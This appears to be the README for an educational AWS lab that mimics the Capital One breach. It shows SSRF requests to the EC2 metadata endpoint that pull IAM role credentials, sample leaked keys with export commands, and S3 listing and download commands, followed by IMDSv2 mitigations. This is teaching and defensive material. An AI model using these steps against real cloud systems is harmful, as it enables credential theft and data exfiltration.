caponeme is a vulnerable cloud environment that meant to mock Capital One Breach for educational purposes

Click here to find out

• Make sure you have the latest version of awscli installed on your terminal.
• Make sure you run this from the us-east-1 (North Virginia) region on the AWS Console.

• Download the capmeonesim.yaml file.
• Log in to the AWS console
• Go to CloudFormation service
• Create new stack and upload the capmeonesim.yaml file you downloaded.
• Allow the template to create IAM resources on your behalf and create the stack.
• Take note of the S3 Bucket name from the CloudFormation Template Outputs, navigate to this bucket and upload some text files inside
• Click on the SSRFWebURL URL from the CloudFormation Template Outputs, it will redirect you to the vulnerable web application.

• On the web application, type the following to get the IAM role name: http://169.254.169.254/latest/meta-data/iam/security-credentials
• Using the IAM role name you got on the previous step, discover the AWS credentials http://169.254.169.254/latest/meta-data/iam/security-credentials/test-SSRFS3Role-14SHRSPDNZFAK
• You'll get something like:

{ "Code" : "Success", "LastUpdated" : "2019-12-22T21:42:57Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIASANNLTVCBCFP445O", "SecretAccessKey" : "v0osgTGnL0n09dHQA6xztS/ZuSS3p8yu+JZ1cAxG", "Token" : "IQoJb3JpZ2luX2VjELb//////////wEaCXVzLWVhc3QtMSJHMEUCIDneXlD6+JLk68XRrQ4X+LrBewvq/9kIYRYhonnW5T9qAiEAmpuGWXeh4rqQ14gmiMU8NvKlxODFh23u5qubMpvC9Rkq0QIIHxABGgwxMzgzMzkzOTI4MzYiDCO/mt42DCCYPTmeJSquAstMGvng3WUgZXlgpm5NiJ+RbYQvnmA1BmIt94LcJeoNpC87MZhxpubTd69zWEqtriLRBXp7KoNQNX5K8ag5eY27R0giQssmidCFED9N/uOgD1Tu33vaVEJoFhzKrd1lhFule3EOHFhImRRGsyfalfY7TWN0GaRNGZlanWdBswpkescM3O43G9J27xeMO22ziu4ajonkCaG51r39/LKj5C1g2VfdXPp5sI0q5+qiG0YSXveN6mGqnN5NXAKNGd4ehYdo4Ot01niy0oS9xtDMLSTVu3XjaxGJwqF5fb4l8Q9zGFe3zA94UShK1uGRBWOfTMHZRwaGYRSTcwximDjEWO4UPKYa50Es5d/12hJdwuFIXPC82i9LyBHXw/ayYn1xyH3bpBwBoYHiereBSuMmMNPG/+8FOs4CX49Hw3xx4pz2/ibkiJ1hjh2/Qu4KZtfTk4SN49q/EAgmP6dx6l/17pRi+T+B7bGk+cES0Ei2806uoTArK8STiO/W3PejELPeoWgy2av+oiL/zt4xXI+hNFdO1xXZXrBGaLbKTZRby+MyrvmDw8GJpxmE1Pyt42pRjxdeQ0NLEcM05JHtxq0/73tEUepsm0Z+6RUqXi9+/BSaP1tRzViApch36d8oJgWARZY5A1eX1d82hCeCiGgNuZxPWC53H3lNXjSRC3dGrx3dI8IJwXgQgEj8e3QP4eeoN3+3H2XFlXE+DopMy6P4ejk8c6Xdk41FbJZrTe1ZoulF2OxLfQbmCOcl85xqJyDEWuZleddagb3jr/Kp7X3Io4bgA+cc0kuQEdLEkfWsKoE8G/uCkSy+tFwn0eqAUmoLVqCxmXS++ZOK3+VX1axY1EMzp68S1g==", "Expiration" : "2019-12-23T04:17:43Z" }

• Type the following on your terminal to impersonate the IAM role

export AWS_ACCESS_KEY_ID="ASIASANNLTVCBCFP445O"
export AWS_SECRET_ACCESS_KEY="v0osgTGnL0n09dHQA6xztS/ZuSS3p8yu+JZ1cAxG"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjELb//////////wEaCXVzLWVhc3QtMSJHMEUCIDneXlD6+JLk68XRrQ4X+LrBewvq/9kIYRYhonnW5T9qAiEAmpuGWXeh4rqQ14gmiMU8NvKlxODFh23u5qubMpvC9Rkq0QIIHxABGgwxMzgzMzkzOTI4MzYiDCO/mt42DCCYPTmeJSquAstMGvng3WUgZXlgpm5NiJ+RbYQvnmA1BmIt94LcJeoNpC87MZhxpubTd69zWEqtriLRBXp7KoNQNX5K8ag5eY27R0giQssmidCFED9N/uOgD1Tu33vaVEJoFhzKrd1lhFule3EOHFhImRRGsyfalfY7TWN0GaRNGZlanWdBswpkescM3O43G9J27xeMO22ziu4ajonkCaG51r39/LKj5C1g2VfdXPp5sI0q5+qiG0YSXveN6mGqnN5NXAKNGd4ehYdo4Ot01niy0oS9xtDMLSTVu3XjaxGJwqF5fb4l8Q9zGFe3zA94UShK1uGRBWOfTMHZRwaGYRSTcwximDjEWO4UPKYa50Es5d/12hJdwuFIXPC82i9LyBHXw/ayYn1xyH3bpBwBoYHiereBSuMmMNPG/+8FOs4CX49Hw3xx4pz2/ibkiJ1hjh2/Qu4KZtfTk4SN49q/EAgmP6dx6l/17pRi+T+B7bGk+cES0Ei2806uoTArK8STiO/W3PejELPeoWgy2av+oiL/zt4xXI+hNFdO1xXZXrBGaLbKTZRby+MyrvmDw8GJpxmE1Pyt42pRjxdeQ0NLEcM05JHtxq0/73tEUepsm0Z+6RUqXi9+/BSaP1tRzViApch36d8oJgWARZY5A1eX1d82hCeCiGgNuZxPWC53H3lNXjSRC3dGrx3dI8IJwXgQgEj8e3QP4eeoN3+3H2XFlXE+DopMy6P4ejk8c6Xdk41FbJZrTe1ZoulF2OxLfQbmCOcl85xqJyDEWuZleddagb3jr/Kp7X3Io4bgA+cc0kuQEdLEkfWsKoE8G/uCkSy+tFwn0eqAUmoLVqCxmXS++ZOK3+VX1axY1EMzp68S1g=="

• Now, you can see all the objects inside this bucket with aws s3api list-objects --bucket <YOUR-S3-BUCKET>
• Then, you can download the bucket objects using aws s3api get-object --bucket <YOUR-S3-BUCKET> --key <YOUR-S3-OBJECT> demo.txt

• From a privileged shell session on your AWS account (not the hacked session), type the following command to enable security token on metadata server of the instance:

  aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --http-endpoint enabled --http-token required
  

• Now switch to the "hacked" shell and try to run the vunlerable web application. What happens?

• Roll back by running the following command:

  aws ec2 modify-instance-metadata-options --instance-id <INSTANCE-ID> --http-endpoint enabled --http-token optional
  

• Go to the IAM role attached to the EC2 Instance, by locating the instance, then pressing on the entity written on IAM role. Press on Attach inline policy, then apply the following policy:

  {
    "Version": "2012-10-17",
    "Statement": [{
    	"Sid": "RunInstanceWithImdsV2Only",
    	"Effect": "Allow",
    	"Action": "ec2:RunInstances",
    	"Resource": "*",
    	"Condition": {
    		"StringEquals": {
    			"ec2:MetadataHttpTokens": "required"
    		}
    	}
    }]
  }
  

• Call the policy IMDSv2InlinePolicy, press Review policy and then Create policy.

• Try to run the list-objects or get-object from the "hacked" shell again. What happens?

• Empty the S3 Bucket
• Delete the CloudFormation stack (won't work if you haven't cleared the bucket from objects)

• You tell me?

We're using some tech to make this work:

• Giraffe - Vulnerable web application
• Bitnami LAMP Stack - AMI using to quickly provision the EC2 Instance

MIT